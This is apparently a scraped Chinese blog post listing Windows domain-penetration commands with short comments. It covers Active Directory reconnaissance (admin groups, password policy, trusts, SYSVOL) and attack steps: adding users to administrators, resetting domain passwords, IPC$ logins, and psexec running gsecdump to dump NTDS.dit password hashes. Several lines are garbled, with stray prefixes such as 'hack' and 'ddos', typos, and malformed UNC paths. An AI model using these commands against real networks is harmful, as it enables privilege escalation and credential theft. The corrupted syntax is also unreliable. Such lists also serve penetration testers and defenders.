net group /domain
//获得所有域用户组列表
net localgroup administrators 用户名 /add 将用户添加至管理组
net group qq_group /domain//显示域中qq_group组的成员
net group qq_group /del /domain//删除域中qq_group组
net group qq_group qq /del /domain//删除域内qq_group 群组中的成员QQ
hack net group qq_group /add /domain//增加域中的群组
net group "domain admins" /domain//获得域管理员列表
net group "enterprise admins" /domain//获得企业管理员列表
net localgroup administrators /domain//获取域内置administrators组用(enterprise admins、domain admins)
net group "domain controllers" /domain//获得域控制器列表
net group "domain computers" /domain//获得所有域成员计算机列表
net user /domain//获得所有域用户列表
net user someuser /domain//获得指定账户someuser的详细信息
net accounts /domain//获得域密码策略设置,密码长短,错误锁定等信息
ddos nei view /domain//查询有几个域, 查询域列表
net view /domain:testdomain//查看 testdomain域中的计算机列表
nltest /domain_trusts//获取域信任信息
net user domain-admin /domain//查看管理员登陆时间,密码过期时间,是否有登陆脚本,组分配等信息
net config Workstation//查询机器属于哪个域
net time /domian//查询主域服务器的时间
echo %logonserver%//查看登陆到这台服务器的计算机名
net time \192.168.1.1//查询远程共享主机192.168.1.1的时间
net use \IP\ipc$ password /user:username@domain//ipc$域内连接
net view \dc2.backlion.com//查看域控共享情况
dir \dc2.backlion.com\SYSVOL /s /a > sysvol.txt//列出sysvol日志记录
xcopy \dc2.backlion.com\sysvol.txt sysvol.txt /i /e /c//远程拷贝到本地sysvol日志
net user /domain bk bk123//修改域内用户密码,需要管理员权限
net localgroup administartors SEZKL\backlion /add//将SEZKL域中的用户backlion添加到administrators组中
mstsc /admin//远程桌面登录到console会话解决hash无法抓出问题
cmd命令 gpupdate/force//更新域策略
psexec \192.168.1.3 -u administrator -p bk1234 -c gsecdump.exe -u//从域服务器密码存储文件windows/ntds/ntds.dit导出hash值出来
gsecdump -a//获取域登管理员登录过得hash值,这里gescdump为第三方导出AD域的hash值
tasklist /S ip /U domain\username /P /V//查看远程计算机进程列
域渗透DOS命令
最新推荐文章于 2024-07-31 14:57:32 发布